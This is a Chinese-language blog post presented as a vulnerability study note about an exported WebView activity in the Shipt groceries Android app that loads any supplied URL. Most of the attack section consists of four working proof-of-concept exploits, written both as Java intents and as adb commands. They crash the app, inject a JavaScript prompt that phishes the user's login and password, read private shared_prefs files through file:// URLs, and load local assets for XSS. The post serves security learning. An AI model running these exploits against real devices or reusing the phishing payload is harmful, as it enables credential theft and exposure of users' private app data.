漏洞学习|攻击导出的WebView Activity

tea9

发布于 2023-09-06 14:10:50

2860

发布于 2023-09-06 14:10:50

文章被收录于专栏：tea9的博客

漏洞学习|攻击导出的WebView Activity

漏洞描述

com.pushio.manager.iam.ui.PushIOMessageViewActivity已将导出设置为 true 使该活动容易受到攻击。

<activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
  <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:scheme="@string/responsys_api_key"/>
  </intent-filter>
</activity>

com.pushio.manager.iam.ui.PushIOMessageViewActivity允许与WebView交互的类中的一个问题：

rotected void onStart() {
...
Bundle extras = getIntent().getExtras();
PIOLogger.d("PIOMVA oS extras: " + extras);
if (extras != null) {
    final String content = extras.getString(Param.CONTENT);
    final String url = extras.getString("url");
    String viewType = extras.getString("type");
    ...
    if (TextUtils.isEmpty(viewType)) {
        PIOLogger.w("PIOMVA oS view type not found, closing window...");
        finish();
        return;
    } else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
    ...
    public void run() {
        try {
            if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
                PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
                if (!TextUtils.isEmpty(content)) {
                    PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
                } else if (TextUtils.isEmpty(url)) {
                    PushIOMessageViewActivity.this.finish();
                } else {
                    PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
                }
            }
        } catch (BadTokenException e) {
            PIOLogger.d("PIOMVA oSt " + e.getMessage());
        }

借助特殊意图，可以传递if块并加载您自己的 URL 地址或 Javascript。看上面代码走到else就可以加载任意url且没有做任何限制。

PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url

您可以通过控制台 adb 或通过我的应用程序 HunterExploit 利用此漏洞 PoC 1 - 终止进程 - 允许停止shipt进程 - 信息可用性的威胁 Java PoC：

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");
intent.putExtra("type", "alert");
startActivity(intent);

ADB Poc: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “chrome://crash” –es “type” “alert”

PoC 2 - XSS - 允许网络钓鱼攻击 Java PoC：可以在应用内打开钓鱼网站的链接

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("url", "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");var Password = window.prompt(\"Authorization: Password\", \"Input Password\"); alert('Interception of data: '+Login+' '+Password)}");
intent.putExtra("type", "alert");
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
        try {
            Thread.sleep(10000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
 startActivity(intent);

ADB PoC: adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity Wait for the application to load, and then run the following command adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “javascript:{window.prompt('Authorization:Login','Input_Login');window.prompt('Authorization:Password','Input_Password')}” –es “type” “alert” PoC 3 - LFI - 允许您在没有 root 访问权限的情况下读取机密用户文件 - 信息机密性 Java PoC 的威胁：访问应用内沙箱文件，如果登录信息明文存储在shared_prefs里也可用于窃取登录信息

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");

startActivity(intent);

ADB PoC: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml” –es “type” “alert” PoC 4 - 读取文件或加载android_asset Java PoC：加载本地html可用于xss攻击

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");

startActivity(intent);

ADB PoC: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///android_asset/www/index.html” –es “type” “alert”